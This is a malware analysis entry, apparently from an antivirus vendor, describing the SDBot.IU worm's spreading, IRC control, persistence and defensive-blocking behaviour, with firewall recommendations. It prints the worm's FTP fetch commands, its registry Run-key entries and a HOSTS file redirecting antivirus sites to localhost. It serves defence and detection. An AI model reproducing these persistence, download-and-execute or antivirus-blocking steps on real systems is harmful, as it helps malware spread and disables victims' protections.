Virus

W32/SDBot.IU!worm

Analysis


Specifics
This virus is 32-bit with a packed file size of 68,611 bytes. This virus contains instructions to copy itself to other systems across a network LAN/WAN, and also respond to instructions received from a malicious user after first connecting to an IRC server and channel. When the virus copies itself to systems, the file is saved into the System32 folder as "cool.exe". The file is executed remotely, which then copies itself as "syslog32.exe" in the same folder.

This virus may terminate security applications which match a hard-coded list. This virus may also function as a small FTP server.


Loading At Windows Startup
If virus is run, it will copy itself to the local system into the drivers folder as "ntsyst32.exe" and set a registry entry to load the virus as a service at each Windows startup -

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"Microsoft System Checkup" = wnetlogin.exe
"NT Logging Serivce" = syslog32.exe


IRC Connection
The virus attempts to make an IRC server connection with a common IRC server named "irc.undernet.org". The connection uses a destination TCP port 6667. The connection is used mainly for communication messages however the open port can be used by a malicious user to send instructions to the virus.


Network Shares Infection Method
The virus may attempt to seek other machines on a network and attempt to penetrate them by using a dictionary attack method to log on to the target system, an RPC DCOM exploit or an LSASS exploit.

If a system is vulnerable, the virus attempts to copy itself to the target into these shares and hard-coded locales -

C:\Documents and Settings\All Users\Start Menu\Programs\Startup
C:\WINDOWS\Start Menu\Programs\Startup
C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup
C$\WINNT\Profiles\All Users\Start Menu\Programs\Startup
C$\WINDOWS\Start Menu\Programs\Startup
C$\Documents and Settings\All Users\Start Menu\Programs\Startup
C$


File Retrieval
This virus may attempt to download files from hard-coded websites. For instance, instructions in the virus attempt to make a connection to 'maniacu2.homeftp.net' and retrieve the file "cool2.exe" then execute it. At the time of this writing, the file and server were not accessible.

When the virus begins targeting other systems, it may attempt to retrieve the downloaded file as "cool" using the following FTP instruction set -

open undefinedinfected hostundefined 10051
h
h
get cool.exe
cool.exe


HOSTS File Overwrite
The virus attempts to block the system and user from accessing certain Antivirus websites by overwriting the HOSTS file with invalid resolution details, as in this example -

127.0.0.1 www.trendmicro.com
127.0.0.1 trendmicro.com
127.0.0.1 rads.mcafee.com
127.0.0.1 customer.symantec.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 updates.symantec.com
127.0.0.1 update.symantec.com
127.0.0.1 www.nai.com
127.0.0.1 nai.com
127.0.0.1 secure.nai.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 www.my-etrust.com
127.0.0.1 my-etrust.com
127.0.0.1 mast.mcafee.com
127.0.0.1 ca.com
127.0.0.1 www.ca.com
127.0.0.1 networkassociates.com
127.0.0.1 www.networkassociates.com
127.0.0.1 avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.avp.com
127.0.0.1 kaspersky.com
127.0.0.1 www.f-secure.com
127.0.0.1 f-secure.com
127.0.0.1 viruslist.com
127.0.0.1 www.viruslist.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mcafee.com
127.0.0.1 www.mcafee.com
127.0.0.1 sophos.com
127.0.0.1 www.sophos.com
127.0.0.1 symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 www.symantec.com

The purpose of doing this is to prevent the infected host from updating its Antivirus software.


Miscellaneous
The virus contains these strings in its unpacked form -

---begin--- AV Guy READ: where do u come up with names like Donk.B? Put a reprezentative name like windr0ne ----end----

Windrone 8.1 final by Romanian 1337 hackers


Recommended Action

  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option
  • Using the FortiGate manager, block internal to external and external to internal access using TCP ports 6667 and 10051 - it may require defining ports as a service prior to blocking